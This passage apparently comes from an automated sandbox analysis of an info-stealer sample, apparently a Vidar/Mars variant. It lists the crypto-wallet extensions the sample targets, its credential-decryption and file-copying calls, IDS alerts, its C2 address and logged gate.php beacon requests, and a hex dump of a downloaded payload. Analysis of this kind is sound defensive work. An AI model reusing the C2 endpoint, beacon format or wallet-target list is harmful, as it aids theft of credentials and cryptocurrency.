                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ldinpeekobnhjjdofggfgjlcehhmanlj
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Hiro Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: pocmplpaccanhmnllbbkpgfliimjljgo
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Slope Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Solflare Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: pgiaagfkgcbnmiiolekcfmljdagdhlcm
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Stargazer Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cgeeodpfagjceefieflmdfphplkenlfk
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: EVER Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: gjkdbeaiifkpoencioahhcilildpjhgh
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: partisia-wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: bgjogpoidejdemgoochpnkmdjpocgkha
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Ecto Wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00408E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA,1_2_00405450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_004090C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00408AB0 CryptUnprotectData,1_2_00408AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00408D90
                  Source: 4bVsmYiuXy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 4bVsmYiuXy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr
                  Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr
                  Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00401280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00401090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,1_2_0040B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00407620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B3A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.4:49729 -> 91.92.250.149:80
                  Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.4:49729 -> 91.92.250.149:80
                  Source: TrafficSnort IDS: 2036667 ET TROJAN Win32/Vidar Variant/Mars CnC Activity (GET) 192.168.2.4:49729 -> 91.92.250.149:80
                  Source: TrafficSnort IDS: 2036654 ET TROJAN Win32/Vidar Variant/Mars Stealer Resources Download 91.92.250.149:80 -> 192.168.2.4:49729
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 91.92.250.149/gate.php
                  Found C&C like URL pattern
                  Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790Host: 91.92.250.149Content-Length: 2882Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                  Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.1Host: 91.92.250.149Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /request HTTP/1.1Host: 91.92.250.149Cache-Control: no-cacheCookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                  Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790Host: 91.92.250.149Content-Length: 2882Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.250.149
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00406040
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 16 Dec 2023 17:16:56 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.45Last-Modified: Mon, 11 Dec 2023 20:43:42 GMTETag: "17e499-60c41fd4abebc"Accept-Ranges: bytesContent-Length: 1565849Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc e0 7f 0a 64 56 1f 33 e0 d9 60 19 1c 3f 25 b8 ae 39 08 ed 6f 8f 10 8a d8 56 9b 1e 93 c7 30 f5 53 9a d6 ae 0a ae 62 98 f4 32 c5 f6 72 68 df 60 93 61 48 6f e9 14 02 63 98 61 68 a2 45 91 65 a1 71 b1 29 4d 0f 36 ad 61 18 62 6b a1 82 b3 19 70 a5 53 9a d6 35 6c 5c c3 60 db 91 0f 30 47 bb 01 37 8f f9 ff 3f ff a7 3f cb c4 ee fd 2b 27 5a b8 70 4c 18 29 cd cc 62 98 70 2c 68 73 c5 6a 3a f0 68 8d bc ef 65 56 07 1a 25 8d 24 a0 94 50 97 9c 40 b5 eb 51 99 52 f7 28 84 12 1c 2a 00 a5 59 4d 87 4e d0 89 51 26 82 da 58 8a d3 f3 a3 0c 9c ea 9b 75 72 b6 99 c9 69 65 28 42 2b 08 a1 34 55 46 0b c5 66 96 99 94 ad 20 25 21 22 87 88 18 8e 47 e4 7d 05 40 b5 23 41 f4 9b 91 84 28 08 e8 50 10 3b 2c 14 89 0f 46 ea bd b2 d3 82 bc 12 9a 84 7e 32 fe 77 cf b1 9c 9c 5d 02 ff ad 16 33 aa d0 9c 13 41 07 c0 ed 4b e4 ec 95 68 34 34 09 8d 32 5e df 9b 31 f8 f9 56 3d fc 38 78 f0 60 5d 6d 87 ce 63 9b 46 1a a3 b8 d2 42 45 71 e1 48 13 73 fd 34 df 5b 28 be f5 16 43 14 ad 66 82 d6 d2 82 3e 19 a1 17 e4 b6 1a 04 bd 31 c2 44 50 85 95 e2 bd cb 0c 55 45 a3 36 98 a1 96 5a a9 d4 aa 18 61 4c 2d bf 4e ce 2d 26 72 ea 83 3a cb ac 23 f4 79 d5 40 99 f5 19 67 22 a2 51 07 89 99 41 26 eb 20 3f 37 83 14 e8 20 0f 9b 41 38 1d c4 67 02 d9 77 88 4e 8d a9 66 82 b2 74 90 4c 33 48 8e 0e 12 77 9a e8 ba 40 17 93 77 cc 50 17 69 d4 b3 66 a8 4b 34 ea ef cd 50 a5 74 6a 78 cc 50 25 34 ea 76 33 d4 4a 1a 35 cc 0c d5 45 f3 fa 34 d3 04 75 86 ae 73 bf c9 34 ae da 02 7a 19 3d 9d a9 5f 46 d3 8d eb f1 41 33 6d 03 16 4a 5b a5 89 b6 c9 b4 b6 02 4a 5b 99 51 5b 8a
                  Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.1Host: 91.92.250.149Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /request HTTP/1.1Host: 91.92.250.149Cache-Control: no-cacheCookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                  Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790Host: 91.92.250.149Content-Length: 2882Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.250.149/gate.php6
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.250.149/gate.phpL
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.250.149/request
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.250.149/request/
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: ZMGDJECB.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: ZMGDJECB.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: ZMGDJECB.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: ZMGDJECB.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: 0HDJEU3W.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
